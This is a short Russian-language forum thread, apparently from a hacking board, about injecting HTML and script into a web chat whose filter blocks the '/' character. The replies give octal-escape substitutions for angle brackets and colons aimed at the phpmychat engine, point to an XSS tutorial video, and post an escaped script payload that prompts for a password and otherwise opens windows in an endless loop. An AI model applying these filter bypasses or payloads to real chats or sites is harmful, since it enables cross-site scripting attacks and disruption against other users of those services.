На одном из чатов запнулся на том что там не разрешалось т.е. в тэгах непропускался знак / Это означает что если я пишу: \x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e то тэг попадает на обозрение(ПОЛНОСТЬЮ) в таком виде: ...x3cimg src="http...x3a......antichat.ru...cgi-bin...s.jpg" name="imaga"...x3e Как можно заменить / ????
см. видео zFailure "XSS в чате на muz-tv" там тебе покажут как использовать реплейс символов в строке в ХТМЛ
А какой двиг чата.То что ты написал это phpmychat 0.14 .5 . Ну че то вроде этого.Это старый двиг .Вот попробуй для нового < =\\74\ > = \\76\\ </ =\\74/ : = \\72 Понятно?
функция window.open na JS на HTML <a href=page.htm target=_blank <!-- если надо в новом окне -->>link</a>
\\74\script language="javascript"\\76\\ var nameData = "007"; if (nameData == prompt ("*****" ))alert("************!"); else for(1;1;100) open(1);\\74\/script\\76\\ Вот уже переделаный